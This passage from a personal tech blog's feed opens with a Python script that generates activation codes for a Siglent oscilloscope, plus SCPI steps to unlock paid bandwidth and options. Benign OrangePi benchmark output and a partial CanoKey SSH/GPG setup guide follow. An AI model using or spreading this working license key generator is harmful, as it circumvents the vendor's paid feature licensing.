class="string">'5zao9lyua01pp7hjzm3orcq90mds63z6zi5kv7vmv3ih981vlwn06txnjdtas3u2wa8msx61i12ueh14t7kqwsfskg032nhyuy1d9vv2wm925rd18kih9xhkyilobbgy'</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">gen</span>(<span class="params">x</span>):</span><br><span class="line"> h = hashlib.md5((</span><br><span class="line"> hashkey +</span><br><span class="line"> 
(Model+<span class="string">'\n'</span>).ljust(<span class="number">32</span>, <span class="string">'\x00'</span>) +</span><br><span class="line"> opt.ljust(<span class="number">5</span>, <span class="string">'\x00'</span>) +</span><br><span class="line"> <span class="number">2</span>*(((SCOPEID <span class="keyword">if</span> opt <span class="keyword">in</span> bwopt <span class="keyword">else</span> SN) + <span class="string">'\n'</span>).ljust(<span class="number">32</span>, <span class="string">'\x00'</span>)) + <span class="string">'\x00'</span>*<span class="number">16</span>).encode(<span class="string">'ascii'</span>)</span><br><span class="line"> ).digest()</span><br><span class="line"> key = <span class="string">''</span></span><br><span class="line"> <span class="keyword">for</span> b <span class="keyword">in</span> h:</span><br><span class="line"> <span class="keyword">if</span> (b <= <span class="number">0x2F</span> <span class="keyword">or</span> b > <span class="number">0x39</span>) <span class="keyword">and</span> (b <= <span class="number">0x60</span> <span class="keyword">or</span> b > <span class="number">0x7A</span>):</span><br><span class="line"> m = b % <span class="number">0x24</span></span><br><span class="line"> b = m + (<span class="number">0x57</span> <span class="keyword">if</span> m > <span class="number">9</span> <span class="keyword">else</span> <span class="number">0x30</span>)</span><br><span class="line"> <span class="keyword">if</span> b == <span class="number">0x30</span>:</span><br><span class="line"> b = <span class="number">0x32</span></span><br><span class="line"> <span class="keyword">if</span> b == <span class="number">0x31</span>:</span><br><span class="line"> b = <span class="number">0x33</span></span><br><span class="line"> <span class="keyword">if</span> b == <span class="number">0x6c</span>:</span><br><span class="line"> b = <span class="number">0x6d</span></span><br><span class="line"> <span class="keyword">if</span> b 
== <span class="number">0x6f</span>:</span><br><span class="line"> b = <span class="number">0x70</span></span><br><span class="line"> key += <span class="built_in">chr</span>(b)</span><br><span class="line"> <span class="keyword">return</span> key.upper()</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(<span class="string">'--------------------------------'</span>)</span><br><span class="line"><span class="built_in">print</span>(<span class="string">'\n'</span>)</span><br><span class="line"><span class="keyword">for</span> opt <span class="keyword">in</span> bwopt:</span><br><span class="line"> <span class="built_in">print</span>(<span class="string">'{:5} {}'</span>.<span class="built_in">format</span>(opt, gen(SCOPEID)))</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(<span class="string">'\n'</span>)</span><br><span class="line"><span class="built_in">print</span>(<span class="string">'--------------------------------'</span>)</span><br><span class="line"><span class="built_in">print</span>(<span class="string">'\n'</span>)</span><br><span class="line"><span class="keyword">for</span> opt <span class="keyword">in</span> otheropt:</span><br><span class="line"> <span class="built_in">print</span>(<span class="string">'{:5} {}'</span>.<span class="built_in">format</span>(opt, gen(SN)))</span><br><span class="line"></span><br></pre></td></tr></table></figure><h3 id="4-升级带宽"><a href="#4-升级带宽" class="headerlink" title="4. Upgrade the bandwidth"></a>4. Upgrade the bandwidth</h3><p>Note: before entering any script-generated activation code on the SCPI page, first run the command <code>MCBD?</code> to query the activation code of the current bandwidth (usually the 70M one) and check that it matches the 70M activation code generated by the script; if it does not, first check that <code>SCOPEID</code> and <code>SN</code> were entered correctly in the script. </p><p>On the SCPI page run the command <code>MCBD bandwidth-activation-code</code>, for example: <code>MCBD 6M5VE9723IR5RACG</code></p><h3 id="5-解锁选件"><a href="#5-解锁选件" class="headerlink" title="5. Unlock the options"></a>5. Unlock the options</h3><p>Note: after the oscilloscope firmware is upgraded to version 1.1.3.8, FG (USB waveform generator) and 16LA (16-channel logic analyzer), the two options that require buying extra hardware, become standard and do not need manual activation.<br><img src="/pictures/SDS804X-HD-Upgrade/6.png"> 
</p><p>Reboot after all steps are complete.</p>]]></content>
<summary type="html"><h2 id="完成效果"><a href="#完成效果" class="headerlink" title="Result"></a>Result</h2><p>Script source: <a href="https://www.eevblog.com/forum/testgear/siglent-sds-sdg-hack-script/">https://www.eevblog.com/forum/testgear/siglent-sds-sdg-hack-script/</a><br>After the upgrade the model is shown as SDS824X HD: </p>
<p><img src="/pictures/SDS804X-HD-Upgrade/1.png"> </p>
<hr></summary>
<category term="Tutorial" scheme="https://thinkalone.win/categories/%E6%95%99%E7%A8%8B/"/>
<category term="Tutorial" scheme="https://thinkalone.win/tags/%E6%95%99%E7%A8%8B/"/>
<category term="Tinkering" scheme="https://thinkalone.win/tags/%E6%8A%98%E8%85%BE%E9%82%A3%E4%BA%9B%E4%BA%8B/"/>
</entry>
<entry>
<title>OrangePi Zero3 CPU Benchmark</title>
<link href="https://thinkalone.win/OrangePiZero3-CPU-Benchmark.html"/>
<id>https://thinkalone.win/OrangePiZero3-CPU-Benchmark.html</id>
<published>2025-02-01T04:00:00.000Z</published>
<updated>2025-02-01T04:00:00.000Z</updated>
<content type="html"><![CDATA[<p>CPU:H618<br>RAM:2G </p><p>screenfetch </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"> _,met$$$$$gg. disappear9@Zero3</span><br><span class="line"> ,g$$$$$$$$$$$$$$$P. OS: Debian 12 bookworm</span><br><span class="line"> ,g$$P"" """Y$$.". Kernel: aarch64 Linux 6.6.75-current-sunxi64</span><br><span class="line"> ,$$P' `$$$. Uptime: 11d 6h 33m</span><br><span class="line">',$$P ,ggs. `$$b: Packages: 442</span><br><span class="line">`d$$' ,$P"' . $$$ Shell: bash</span><br><span class="line"> $$P d$' , $$P Disk: 2.0G / 58G (4%)</span><br><span class="line"> $$: $$. - ,d$$' CPU: ARM Cortex-A53 @ 4x 1.512GHz</span><br><span class="line"> $$\; Y$b._ _,d$P' RAM: -</span><br><span class="line"> Y$$. 
`.`"Y$$$$P"'</span><br><span class="line"> `$$b "-.__</span><br><span class="line"> `Y$$</span><br><span class="line"> `Y$$.</span><br><span class="line"> `$$b.</span><br><span class="line"> `Y$$b.</span><br><span class="line"> `"Y$b._</span><br><span class="line"> `""""</span><br><span class="line"></span><br></pre></td></tr></table></figure><span id="more"></span><p>7-zip 16.02:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line">disappear9@Zero3:~$ 7z b -mmt4</span><br><span class="line"></span><br><span 
class="line">7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21</span><br><span class="line">p7zip Version 16.02 (locale=zh_CN.UTF-8,Utf16=on,HugeFiles=on,64 bits,4 CPUs LE)</span><br><span class="line"></span><br><span class="line">LE</span><br><span class="line">CPU Freq: - - - - - 256000000 - 1024000000 -</span><br><span class="line"></span><br><span class="line">RAM size: 1918 MB, # CPU hardware threads: 4</span><br><span class="line">RAM usage: 882 MB, # Benchmark threads: 4</span><br><span class="line"></span><br><span class="line"> Compressing | Decompressing</span><br><span class="line">Dict Speed Usage R/U Rating | Speed Usage R/U Rating</span><br><span class="line"> KiB/s % MIPS MIPS | KiB/s % MIPS MIPS</span><br><span class="line"></span><br><span class="line">22: 2339 340 669 2276 | 52855 398 1132 4509</span><br><span class="line">23: 2201 347 647 2243 | 51734 398 1124 4476</span><br><span class="line">24: 2097 355 636 2256 | 49812 398 1099 4373</span><br><span class="line">25: 2014 364 631 2300 | 48705 398 1088 4335</span><br><span class="line">---------------------------------- | ------------------------------</span><br><span class="line">Avr: 351 646 2269 | 398 1111 4423</span><br><span class="line">Tot: 375 878 3346</span><br><span class="line">disappear9@Zero3:~$ 7z b -mmt1</span><br><span class="line"></span><br><span class="line">7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21</span><br><span class="line">p7zip Version 16.02 (locale=zh_CN.UTF-8,Utf16=on,HugeFiles=on,64 bits,4 CPUs LE)</span><br><span class="line"></span><br><span class="line">LE</span><br><span class="line">CPU Freq: 64000000 64000000 - - - 256000000 - 1024000000 -</span><br><span class="line"></span><br><span class="line">RAM size: 1918 MB, # CPU hardware threads: 4</span><br><span class="line">RAM usage: 435 MB, # Benchmark threads: 1</span><br><span class="line"></span><br><span class="line"> Compressing | Decompressing</span><br><span 
class="line">Dict Speed Usage R/U Rating | Speed Usage R/U Rating</span><br><span class="line"> KiB/s % MIPS MIPS | KiB/s % MIPS MIPS</span><br><span class="line"></span><br><span class="line">22: 914 100 890 890 | 16813 100 1436 1436</span><br><span class="line">23: 868 100 885 884 | 16460 100 1425 1425</span><br><span class="line">24: 831 100 894 894 | 16095 100 1413 1413</span><br><span class="line">25: 790 100 902 902 | 15692 100 1397 1397</span><br><span class="line">---------------------------------- | ------------------------------</span><br><span class="line">Avr: 100 893 893 | 100 1418 1418</span><br><span class="line">Tot: 100 1155 1155</span><br></pre></td></tr></table></figure><p>phoronix-test-suite benchmark compress-7zip</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span 
class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br></pre></td><td class="code"><pre><span class="line">disappear9@Zero3:~/phoronix-test-suite$ ./phoronix-test-suite benchmark compress-7zip</span><br><span class="line"></span><br><span class="line">Phoronix Test Suite v10.8.4</span><br><span class="line"></span><br><span class="line"> To Install: pts/compress-7zip-1.11.0</span><br><span class="line"></span><br><span class="line">System 
Information</span><br><span class="line"></span><br><span class="line"> PROCESSOR: ARMv8 Cortex-A53 @ 1.51GHz</span><br><span class="line"> Core Count: 4</span><br><span class="line"> Scaling Driver: cpufreq-dt ondemand</span><br><span class="line"></span><br><span class="line"> GRAPHICS:</span><br><span class="line"></span><br><span class="line"> MOTHERBOARD: OrangePi Zero3</span><br><span class="line"></span><br><span class="line"> MEMORY: 2048MB</span><br><span class="line"></span><br><span class="line"> DISK: 62GB SE064</span><br><span class="line"> File-System: ext4</span><br><span class="line"> Mount Options: commit=120 errors=remount-ro noatime rw</span><br><span class="line"> Disk Details: Block Size: 4096</span><br><span class="line"></span><br><span class="line"> OPERATING SYSTEM: Debian 12</span><br><span class="line"> Kernel: 6.6.75-current-sunxi64 (aarch64)</span><br><span class="line"> Compiler: GCC 12.2.0</span><br><span class="line"> Security: gather_data_sampling: Not affected</span><br><span class="line"> + itlb_multihit: Not affected</span><br><span class="line"> + l1tf: Not affected</span><br><span class="line"> + mds: Not affected</span><br><span class="line"> + meltdown: Not affected</span><br><span class="line"> + mmio_stale_data: Not affected</span><br><span class="line"> + reg_file_data_sampling: Not affected</span><br><span class="line"> + retbleed: Not affected</span><br><span class="line"> + spec_rstack_overflow: Not affected</span><br><span class="line"> + spec_store_bypass: Not affected</span><br><span class="line"> + spectre_v1: Mitigation of __user pointer sanitization</span><br><span class="line"> + spectre_v2: Not affected</span><br><span class="line"> + srbds: Not affected</span><br><span class="line"> + tsx_async_abort: Not affected</span><br><span class="line"></span><br><span class="line">Current Description: ARMv8 Cortex-A53 testing on Debian 12 via the Phoronix Test Suite.</span><br><span class="line"></span><br><span 
class="line">7-Zip Compression 24.05:</span><br><span class="line"> pts/compress-7zip-1.11.0</span><br><span class="line"> Test 1 of 1</span><br><span class="line"> Estimated Trial Run Count: 3</span><br><span class="line"> Estimated Time To Completion: 17 Minutes</span><br><span class="line"> Started Run 1</span><br><span class="line"> Started Run 2</span><br><span class="line"> Started Run 3</span><br><span class="line"></span><br><span class="line"> Test: Compression Rating:</span><br><span class="line"> 2688</span><br><span class="line"> 2667</span><br><span class="line"> 2656</span><br><span class="line"></span><br><span class="line"> Average: 2670 MIPS</span><br><span class="line"> Deviation: 0.61%</span><br><span class="line"></span><br><span class="line"> Test: Decompression Rating:</span><br><span class="line"> 4757</span><br><span class="line"> 4737</span><br><span class="line"> 4741</span><br><span class="line"></span><br><span class="line"> Average: 4745 MIPS</span><br><span class="line"> Deviation: 0.22%</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">ARMv8 Cortex-A53 testing on Debian 12 via the Phoronix Test Suite.</span><br><span class="line"></span><br><span class="line"> Processor: ARMv8 Cortex-A53 @ 1.51GHz (4 Cores), Motherboard: OrangePi Zero3, Memory: 2048MB, Disk: 62GB SE064</span><br><span class="line"></span><br><span class="line"> OS: Debian 12, Kernel: 6.6.75-current-sunxi64 (aarch64), Compiler: GCC 12.2.0, File-System: ext4</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> 7-Zip Compression 24.05</span><br><span class="line"> Test: Compression Rating</span><br><span class="line"> MIPS > Higher Is Better</span><br><span class="line"> Zero3 . 
2670</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> 7-Zip Compression 24.05</span><br><span class="line"> Test: Decompression Rating</span><br><span class="line"> MIPS > Higher Is Better</span><br><span class="line"> Zero3 . 4745</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>sysbench </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span 
class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br></pre></td><td class="code"><pre><span class="line">disappear9@Zero3:~$ sysbench cpu --cpu-max-prime=20000 --threads=4 run</span><br><span class="line">sysbench 1.0.20 (using system LuaJIT 2.1.0-beta3)</span><br><span class="line"></span><br><span class="line">Running the test with following options:</span><br><span class="line">Number of threads: 4</span><br><span class="line">Initializing random number generator from current time</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Prime numbers limit: 20000</span><br><span class="line"></span><br><span class="line">Initializing worker threads...</span><br><span class="line"></span><br><span class="line">Threads started!</span><br><span class="line"></span><br><span class="line">CPU speed:</span><br><span class="line"> events per second: 1124.46</span><br><span class="line"></span><br><span class="line">General statistics:</span><br><span class="line"> total time: 10.0030s</span><br><span class="line"> total number of events: 11254</span><br><span class="line"></span><br><span class="line">Latency (ms):</span><br><span class="line"> min: 3.35</span><br><span class="line"> avg: 3.55</span><br><span class="line"> max: 10.86</span><br><span class="line"> 95th percentile: 4.25</span><br><span class="line"> sum: 40002.45</span><br><span class="line"></span><br><span class="line">Threads fairness:</span><br><span class="line"> events (avg/stddev): 2813.5000/0.50</span><br><span class="line"> execution time 
(avg/stddev): 10.0006/0.00</span><br><span class="line"></span><br><span class="line">disappear9@Zero3:~$ sysbench cpu --cpu-max-prime=20000 --threads=1 run</span><br><span class="line">sysbench 1.0.20 (using system LuaJIT 2.1.0-beta3)</span><br><span class="line"></span><br><span class="line">Running the test with following options:</span><br><span class="line">Number of threads: 1</span><br><span class="line">Initializing random number generator from current time</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Prime numbers limit: 20000</span><br><span class="line"></span><br><span class="line">Initializing worker threads...</span><br><span class="line"></span><br><span class="line">Threads started!</span><br><span class="line"></span><br><span class="line">CPU speed:</span><br><span class="line"> events per second: 294.62</span><br><span class="line"></span><br><span class="line">General statistics:</span><br><span class="line"> total time: 10.0007s</span><br><span class="line"> total number of events: 2948</span><br><span class="line"></span><br><span class="line">Latency (ms):</span><br><span class="line"> min: 3.35</span><br><span class="line"> avg: 3.39</span><br><span class="line"> max: 10.65</span><br><span class="line"> 95th percentile: 3.36</span><br><span class="line"> sum: 9998.34</span><br><span class="line"></span><br><span class="line">Threads fairness:</span><br><span class="line"> events (avg/stddev): 2948.0000/0.00</span><br><span class="line"> execution time (avg/stddev): 9.9983/0.00</span><br><span class="line"></span><br></pre></td></tr></table></figure>]]></content>
<summary type="html"><p>CPU: H618<br>RAM: 2G </p>
<p>screenfetch </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"> _,met$$$$$gg. disappear9@Zero3</span><br><span class="line"> ,g$$$$$$$$$$$$$$$P. OS: Debian 12 bookworm</span><br><span class="line"> ,g$$P&quot;&quot; &quot;&quot;&quot;Y$$.&quot;. Kernel: aarch64 Linux 6.6.75-current-sunxi64</span><br><span class="line"> ,$$P&#x27; `$$$. Uptime: 11d 6h 33m</span><br><span class="line">&#x27;,$$P ,ggs. `$$b: Packages: 442</span><br><span class="line">`d$$&#x27; ,$P&quot;&#x27; . $$$ Shell: bash</span><br><span class="line"> $$P d$&#x27; , $$P Disk: 2.0G / 58G (4%)</span><br><span class="line"> $$: $$. - ,d$$&#x27; CPU: ARM Cortex-A53 @ 4x 1.512GHz</span><br><span class="line"> $$\; Y$b._ _,d$P&#x27; RAM: -</span><br><span class="line"> Y$$. `.`&quot;Y$$$$P&quot;&#x27;</span><br><span class="line"> `$$b &quot;-.__</span><br><span class="line"> `Y$$</span><br><span class="line"> `Y$$.</span><br><span class="line"> `$$b.</span><br><span class="line"> `Y$$b.</span><br><span class="line"> `&quot;Y$b._</span><br><span class="line"> `&quot;&quot;&quot;&quot;</span><br><span class="line"></span><br></pre></td></tr></table></figure></summary>
<category term="测试结果" scheme="https://thinkalone.win/categories/%E6%B5%8B%E8%AF%95%E7%BB%93%E6%9E%9C/"/>
<category term="杂项" scheme="https://thinkalone.win/tags/%E6%9D%82%E9%A1%B9/"/>
<category term="测试结果" scheme="https://thinkalone.win/tags/%E6%B5%8B%E8%AF%95%E7%BB%93%E6%9E%9C/"/>
</entry>
<entry>
<title>Getting Started with Canokey Canary</title>
<link href="https://thinkalone.win/canokey-canary.html"/>
<id>https://thinkalone.win/canokey-canary.html</id>
<published>2025-01-01T04:00:00.000Z</published>
<updated>2026-02-01T04:00:00.000Z</updated>
<content type="html"><![CDATA[<h3 id="引言"><a href="#引言" class="headerlink" title="Introduction"></a>Introduction</h3><p>I first came across Canokey back in 2021, when I followed the crowd and bought a CanoKey Pigeon at launch. After it arrived I loaded my GPG keys onto it and registered it as an authenticator on a few websites, and ever since it has mostly been gathering dust: website logins don't expire every day, nobody has sent me a GPG-encrypted message in ages, and I rarely even use it to sign git commits (I'm lazy). </p><p>A while ago the Canokey group held a giveaway of Canary test units, and I was lucky enough to win one:<br><img src="/pictures/canokey-canary/1.png"> </p><p>So it would seem a bit wrong not to tinker with it some more. </p><hr><h3 id="环境确认"><a href="#环境确认" class="headerlink" title="Environment check"></a>Environment check</h3><p>Hardware:<br>  CanoKey Canary (3.0.0-rc2-0 dirty build)<br>Operating system:<br>  Windows 10 LTSB 21H2<br>Software versions:<br>  gpg4win 4.4 (gpg 2.4.7)<br>  OpenSC 0.26.0 </p><span id="more"></span> <p>Canokey's features fall into these main areas: </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">WebAuthn (Passkey)</span><br><span class="line">OTP</span><br><span class="line">OpenPGP</span><br><span class="line">PIV</span><br></pre></td></tr></table></figure><p>Let's go through how to use each of them in turn (this also serves as a memo for myself). </p><h3 id="WebAuthn-Passkey"><a href="#WebAuthn-Passkey" class="headerlink" title="WebAuthn (Passkey)"></a>WebAuthn (Passkey)</h3><p><img src="/pictures/canokey-canary/2.png"> </p><p>After that it can be used as an authenticator for website logins; I won't go into detail here. </p><h4 id="SSH-FIDO"><a href="#SSH-FIDO" class="headerlink" title="SSH FIDO"></a>SSH FIDO</h4><p>Reference: <a href="https://docs.canokeys.org/zh-hans/userguide/ctap/">WebAuthn (Passkey)</a><br>All commands are run in PowerShell<br>Make sure the installed OpenSSH is version 8.2 or later </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ssh -V</span><br><span class="line">sshd -V</span><br></pre></td></tr></table></figure><p>In my testing, only Discoverable Credentials (Resident Keys) work in the current environment; non-discoverable credentials do not work, whether I use the SSH client that ships with Windows or forward through <a href="https://github.com/tetractic/SK-SSH-Agent">SK SSH Agent</a>. 
I don't know why, so any pointers are welcome.<br>Besides these there is also a modified build of putty: <a href="https://github.com/NoMoreFood/putty-cac">putty-cac</a>, which I have not tested.<br>Since I don't often use the SSH client that ships with Windows to connect to servers, and running SK SSH Agent also occupies the Agent port, the setup I use day to day is SSH with gpg agent, described below; this section is just a quick try. </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh-keygen -t ed25519-sk -O resident</span><br></pre></td></tr></table></figure><p>Add the contents of the generated public key file <code>~/.ssh/id_ed25519_sk.pub</code> to the <code>authorized_keys</code> file on the target server.<br>After that it works either directly with the SSH client that ships with Windows, or with SK SSH Agent once <code>~/.ssh/id_ed25519_sk</code> has been loaded into it. </p><h3 id="OTP"><a href="#OTP" class="headerlink" title="OTP"></a>OTP</h3><p><strong>My advice: don't use it</strong><br>I recommend KeePass with the KeeTrayTOTP plugin, or on a phone the <a href="https://play.google.com/store/apps/details?id=com.stratumauth.app">Stratum - Authenticator App</a> (<a href="https://github.com/stratumauth/app">https://github.com/stratumauth/app</a>) </p><h3 id="OpenPGP"><a href="#OpenPGP" class="headerlink" title="OpenPGP"></a>OpenPGP</h3><p>Reference: <a href="https://editst.com/2022/canokey-guide/#OpenPGP">Canokey Guide: OTP, FIDO2, PGP and PIV</a><br>All commands are run in PowerShell </p><h4 id="1-生成主密钥"><a href="#1-生成主密钥" class="headerlink" title="1. Generate the primary key"></a>1. Generate the primary key</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span 
class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br></pre></td><td class="code"><pre><span class="line">$ gpg --expert --full-gen-key</span><br><span class="line"></span><br><span class="line">gpg (GnuPG) 2.3.4; Copyright (C) 2021 g10 Code GmbH</span><br><span class="line">This is free software: you are free to change and redistribute it.</span><br><span class="line">There is NO WARRANTY, 
to the extent permitted by law.</span><br><span class="line"></span><br><span class="line">Please select what kind of key you want:</span><br><span class="line"></span><br><span class="line"> (11) ECC (set your own capabilities)</span><br><span class="line"></span><br><span class="line">Your selection? 11</span><br><span class="line"></span><br><span class="line"># The ECC algorithm is recommended</span><br><span class="line"></span><br><span class="line">Possible actions for this ECC key: Sign Certify Authenticate</span><br><span class="line">Current allowed actions: Sign Certify</span><br><span class="line"></span><br><span class="line"> (S) Toggle the sign capability</span><br><span class="line"></span><br><span class="line">Your selection? s</span><br><span class="line"></span><br><span class="line"># Keep only the Certify capability on the primary key; use subkeys for everything else</span><br><span class="line"></span><br><span class="line">Possible actions for this ECC key: Sign Certify Authenticate</span><br><span class="line">Current allowed actions: Certify</span><br><span class="line"></span><br><span class="line"> (Q) Finished</span><br><span class="line"></span><br><span class="line">Your selection? q</span><br><span class="line"></span><br><span class="line">Please select which elliptic curve you want:</span><br><span class="line"></span><br><span class="line"> (1) Curve 25519 *default*</span><br><span class="line"></span><br><span class="line">Your selection? 1</span><br><span class="line"></span><br><span class="line">Please specify how long the key should be valid.</span><br><span class="line"></span><br><span class="line"> <n>y = key expires in n years</span><br><span class="line"></span><br><span class="line">Key is valid for? (0) 10y</span><br><span class="line">Key does not expire at all</span><br><span class="line">Is this correct? 
